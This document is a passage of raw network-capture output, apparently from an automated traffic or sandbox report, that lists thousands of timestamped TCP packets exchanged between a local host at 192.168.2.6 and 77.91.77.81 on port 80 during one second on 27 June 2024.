                                                                Jun 27, 2024 05:59:05.393454075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393471003 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393477917 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393500090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393507004 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393527031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393537045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393547058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393559933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393573999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393587112 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393595934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393608093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393616915 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393630028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393641949 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393652916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393666029 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393676996 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393687963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393699884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393713951 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393723965 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393738985 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393745899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.393754959 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.393780947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394135952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394175053 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394265890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394280910 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394294024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394303083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394316912 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394326925 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394342899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394349098 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394356012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394368887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394378901 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394392014 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394402981 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394414902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394426107 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394437075 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394452095 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394459963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394474030 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394495010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394706011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394720078 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394732952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394752026 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394762993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394773006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394785881 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394800901 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394809008 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394823074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394833088 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394843102 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394855022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.394864082 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.394890070 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.395103931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395118952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395132065 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395149946 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395157099 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.395165920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.395179987 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395191908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.395203114 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.395216942 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.395236015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410666943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410732985 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410764933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410778999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410794973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410809040 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410819054 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410829067 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410841942 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410851955 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410861969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410875082 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.410886049 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410912991 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.410972118 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.411057949 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.411129951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.411170006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.473912001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.473934889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.473952055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474024057 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474040031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474056005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474076033 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474076986 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474076986 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474096060 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474106073 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474148035 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474180937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474225044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474250078 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474265099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474278927 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474293947 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474306107 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474318027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474328995 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474344015 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.474354029 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474375963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.474400043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.481940985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.481966019 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.481981039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.481992006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482013941 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482028961 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482074022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482088089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482121944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482135057 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482220888 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482234001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482249022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482260942 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482273102 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482283115 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482295036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482316017 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482337952 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482412100 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482460022 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482487917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482502937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482533932 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482557058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482625961 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482639074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482654095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482667923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482686043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482697010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482707977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482731104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482754946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482918024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482932091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482944965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482959986 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482969046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.482981920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.482991934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483012915 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483042002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483083010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483095884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483110905 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483124018 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483134031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483146906 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483158112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483179092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483201981 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483402967 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483417034 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483432055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483449936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483457088 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483474016 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483480930 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483493090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483501911 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483515024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483529091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483539104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483551979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483563900 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483576059 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483588934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483618021 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483866930 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483880997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483895063 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483910084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483917952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.483937025 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.483961105 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484220028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484234095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484249115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484266043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484275103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484289885 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484299898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484313011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484325886 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484337091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484347105 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484359980 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484378099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484385014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484396935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484406948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484421015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484428883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484441042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484453917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484467983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484477997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484498978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484510899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484522104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484534979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484555960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484570026 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484905005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484919071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484934092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484949112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.484957933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.484977961 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485003948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485182047 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485196114 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485209942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485229015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485239983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485249996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485263109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485276937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485286951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485300064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485310078 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485322952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485332012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485344887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485353947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485371113 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485378027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485389948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485399008 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485410929 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485423088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485440016 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485447884 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485460997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485469103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485481977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485492945 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485506058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485517025 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.485529900 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.485551119 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486150026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486164093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486177921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486190081 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486200094 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486212969 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486222029 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486236095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486248970 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486259937 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486273050 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486283064 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486294985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486305952 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486318111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486326933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486339092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486347914 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486361027 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486371994 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486387014 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486393929 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486411095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486418009 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486432076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486440897 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486452103 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486464977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486478090 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486488104 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486506939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.486515045 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486529112 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.486546040 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501722097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501830101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501852036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501868010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501876116 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501885891 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501904964 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501912117 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501929045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501935959 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501949072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501957893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.501970053 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.501996040 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.564989090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565017939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565032959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565135956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565164089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565177917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565191031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565216064 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565247059 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565304995 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565319061 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565332890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565351963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565361977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565382957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565418959 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565510988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565526009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565538883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565552950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.565562963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.565591097 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.573738098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.573771954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.573792934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.573803902 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.573827982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.573852062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.573879004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.573923111 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574006081 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574019909 CEST804972977.91.77.81192.168.2.6
